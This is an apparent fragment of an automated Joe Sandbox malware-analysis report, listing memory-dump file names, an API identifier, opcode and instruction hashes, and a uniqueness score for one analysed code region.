                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID: @$@4_w@4_w
                                                              • API String ID: 4062629308-713214301
                                                              • Opcode ID: 80ffbc30bd198da084b78b7e551132f7b2662def8cd53cdddadcd4f94a92acbe
                                                              • Instruction ID: 102f3870a32b56f9645a81c6c8731d6cfe6abebd1aef7535178804c8cd46f775
                                                              • Opcode Fuzzy Hash: 80ffbc30bd198da084b78b7e551132f7b2662def8cd53cdddadcd4f94a92acbe
                                                              • Instruction Fuzzy Hash: 19419F71901629DFCB218FD6DC80AADBBB9FF54714F20402BF904EB264D734A925DB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%